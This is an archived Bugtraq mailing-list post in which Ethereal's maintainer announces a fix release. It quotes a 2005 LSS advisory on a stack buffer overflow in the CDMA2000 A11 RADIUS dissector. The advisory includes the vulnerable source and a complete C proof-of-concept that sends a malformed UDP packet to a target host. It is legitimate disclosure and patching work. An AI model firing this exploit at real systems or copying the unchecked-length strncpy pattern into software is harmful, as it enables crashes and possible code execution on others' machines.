lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 08 Mar 2005 17:45:59 -0600
From: Gerald Combs <gerald@...ereal.com>
To: Bugtraq <bugtraq@...urityfocus.com>
Subject: Re: Ethereal remote buffer overflow


Ethereal 0.10.10 will be released on Thursday, March 10.  It will fix
this as well as two other security and stability-related issues.  If you
need a fix immediately, you can download source tarballs and Windows
installers from

    http://www.ethereal.com/distribution/buildbot-builds/


LSS Security wrote:
> 			LSS Security Advisory #LSS-2005-03-04
> 			       http://security.lss.hr
> 
> ---
> 
> Title			:  Ethereal remote buffer overflow
> Advisory ID		:  LSS-2005-03-04
> Date			:  08.03.2005 
> Advisory URL:		:  http://security.lss.hr/en/index.php?page=exp 
> Impact			:  Stack overflow and possible code execution
> Risk level		:  High 
> Vulnerability type	:  Remote 
> Vendors contacted	:  Yes
> 
> ---
> 
> 
> 
> 
> ===[ Overview 
> 
> Ethereal is used by network professionals around the world for troubleshooting, 
> analysis, software and protocol development, and education. It has all of the 
> standard features  you would expect in a protocol analyzer, and several 
> features not seen in any other product. Its open source license allows talented 
> experts in the networking community to add enhancements. It runs on all popular 
> computing platforms, including Unix, Linux, and Windows.
> 
> 
> 
> ===[ Vulnerability
> 
> There is remote buffer overflow vulnerability in Ethereal dissector for 
> CDMA2000 A11 packets. Vulnerability is located in dissect_a11_radius() function 
> in packet-3g-a11.c used for RADIUS authentication dissection. Number of bytes 
> that will be copied from packet to buffer in stack is taken from packet itself. 
> 16 bytes are reserved for that buffer, and string length can be up to 256 bytes 
> (unsigned char), so is possible to overflow local variables and return address. 
> 
> 
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
>   size_t     radius_len;
>   ...
>   guchar     str_val[MAX_STRVAL]; 
>   ...
>   radius_len = tvb_get_guint8(tvb, offset + 1);
>   ...
>   strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2); 
> ...
> }
> ----------------
> 
> A similar vulnerability was also found in same function few lines below where 
> RADIUS attributes are copied to stack.
> 
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
>   guint      attribute_len;
>   ...
>   guchar     str_val[MAX_STRVAL];
>   ...
>   attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
>   ...
>   case ATTR_TYPE_STR:
>   strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2),
>          attribute_len - 2); 
> 
> ...
> }
> ----------------
> 
> 
> 
> ===[ Affected versions
> 
> All versions after 3G-A11 dissector was added to CVS including latest 0.10.9.
> Vulnerability was tested with latest Ethereal on Linux and Windows.
> 
> 
> 
> ===[ Fix
> 
> It seems that that they have fixed that vulnerability just few days ago, 
> and new version will probably be available soon from http://www.ethereal.com.
> 
> 
> 
> ===[ PoC Exploit
> 
> Exploit is in attachment, and URL http://security.lss.hr/en/PoC/ 
> 
> 
> 
> ===[ Credits
> 
> Credits for this vulnerability goes to Leon Juranic. 
> 
> 
> 
> ===[ LSS Security Contact
>  
>  LSS Security Team, <eXposed by LSS>
>  
>  WWW    : http://security.lss.hr
>  E-mail : security@....hr
>  Tel	: +385 1 6129 775
>   
> 
> 
> 
> 
> 
> ------------------------------------------------------------------------
> 
> /*
>  * 
>  * Ethereal 3G-A11 remote buffer overflow PoC exploit 
>  * --------------------------------------------------
>  * Coded by Leon Juranic <ljuranic@....hr> 
>  * LSS Security <http://security.lss.hr/en/>
>  * 
>  */ 
> 
> #include <stdio.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <netdb.h>
> 
> 
> main (int argc, char **argv)
> {
> 	int sock;
> 	struct sockaddr_in sin;
> 	unsigned char buf[1024];
> 	char bla[200];
> 
> 	sock=socket(AF_INET,SOCK_DGRAM,0);
> 
> 	sin.sin_family=AF_INET;
> 	sin.sin_addr.s_addr = inet_addr(argv[1]);
> 	sin.sin_port = htons(699);
> 
> 	buf[0] = 22;
> 	memset(buf+1,'A',19);
> 	buf[20] = 38;
> 	*(unsigned short*)&buf[22] = htons(100); 
> 	*(unsigned short*)&buf[28] = 0x0101;
> 	buf[30] = 31;
> 	buf[31] = 150;   // len for overflow...play with this value if it doesn't work
> 
> 	memset (bla,'B',200);
> 	strncpy (buf+32,bla,180);
> 	
> 	sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
> }
> 
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ